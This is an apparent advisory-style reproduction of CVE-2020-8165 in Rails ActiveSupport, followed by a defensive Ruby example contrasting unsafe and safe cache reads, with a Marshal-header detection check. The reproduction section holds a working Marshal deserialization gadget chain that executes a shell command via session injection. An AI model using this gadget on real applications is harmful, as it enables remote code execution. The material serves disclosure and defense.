CVE-2020-8165
A flaw was found in rubygem-activesupport. Untrusted user input that is written to the cache store with the `raw: true` option can, when read back, be treated as a marshaled object rather than as plain text and passed to `Marshal.load`. The threat from this vulnerability is to data confidentiality and integrity as well as system availability.
- Build file

Gemfile:

```ruby
source 'https://rubygems.org'
git_source(:github) { |repo| "https://github.com/#{repo}.git" }

ruby '2.6.3'

gem 'rails', '5.2.3'
gem 'sqlite3'
gem 'puma', '~> 3.11'
gem 'redis', '~> 4.0'
gem 'tzinfo-data', platforms: [:mingw, :mswin, :x64_mingw, :jruby]
```
- Get Rails console

```sh
bundle install --path vendor/bundle
bundle exec rails console
```
- Build payload in Rails console

```ruby
require 'uri'
code = '`touch /tmp/rce`'
erb = ERB.allocate
erb.instance_variable_set :@src, code
erb.instance_variable_set :@filename, "1"
erb.instance_variable_set :@lineno, 1
puts URI.encode_www_form(payload: Marshal.dump(ActiveSupport::Deprecation::DeprecatedInstanceVariableProxy.new erb, :result))
```
- Find the endpoint and inject the payload

The payload has to end up stored in the session so that the session manager deserializes it on a later request.
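To make the root cause concrete from the defender's side, here is an added example (not code from this page or from Rails itself) that mimics the two read paths at issue in a tiny in-memory cache. `ToyCache`, `Marker`, and `looks_marshaled?` are constructed names for this illustration. The unsafe read path does what the vulnerable ActiveSupport versions did: it inspects a `raw: true` entry at read time and hands it to `Marshal.load` if it carries the Marshal version header, so whoever controls the raw value controls which Ruby class gets instantiated. The hardened path returns raw entries as plain strings and moves structured data through JSON, which cannot instantiate arbitrary objects. The header check doubles as a cheap detection rule for request or cache-write logging: user-supplied values that begin with Ruby's Marshal header bytes deserve attention.

```ruby
require 'json'

# Ruby's Marshal stream begins with the two version bytes (currently 4.8).
MARSHAL_HEADER = [Marshal::MAJOR_VERSION, Marshal::MINOR_VERSION].pack('CC').b.freeze

# A harmless named class used only to show that the unsafe read path
# reconstructs whatever class the stored bytes name (constructed example).
Marker = Struct.new(:note)

class ToyCache
  def initialize
    @store = {}
  end

  # Vulnerable pattern: the raw entry is stored as-is, and the *read* side
  # decides whether the bytes "look marshaled" and loads them.
  def write_raw(key, value)
    @store[key] = value.to_s.b
  end

  def read_raw_unsafe(key)
    v = @store[key]
    return nil if v.nil?
    # Sink: Marshal.load on data the writer never intended to be an object.
    v.start_with?(MARSHAL_HEADER) ? Marshal.load(v) : v
  end

  # Hardened pattern: a raw entry is a string and nothing else.
  def read_raw_safe(key)
    @store[key]
  end

  # Structured values go through a serializer that only builds
  # strings, numbers, arrays and hashes.
  def write_json(key, obj)
    @store[key] = JSON.generate(obj)
  end

  def read_json(key)
    v = @store[key]
    v.nil? ? nil : JSON.parse(v)
  end
end

# Detection helper: does an inbound value carry the Marshal header?
def looks_marshaled?(value)
  value.to_s.b.start_with?(MARSHAL_HEADER)
end

# Walk both paths with the same stored bytes and report what each returns.
def demonstrate
  cache = ToyCache.new
  blob = Marshal.dump(Marker.new('benign'))   # constructed, harmless object
  cache.write_raw('entry', blob)
  cache.write_json('profile', { 'name' => 'alice', 'roles' => ['user'] })
  {
    unsafe_class:  cache.read_raw_unsafe('entry').class.name,
    safe_class:    cache.read_raw_safe('entry').class.name,
    safe_is_text:  cache.read_raw_safe('entry') == blob,
    json_roundtrip: cache.read_json('profile'),
    flagged:       looks_marshaled?(blob),
    plain_flagged: looks_marshaled?('just a string')
  }
end

puts demonstrate.inspect if $PROGRAM_NAME == __FILE__
```

Running the file prints a hash in which `unsafe_class` is `"Marker"` (the stored bytes chose the class) while `safe_class` is `"String"`; that difference is the whole bug. The same principle applies to the fix shipped in Rails 5.2.4.3 and 6.0.3.1: raw cache entries are no longer unmarshaled on read.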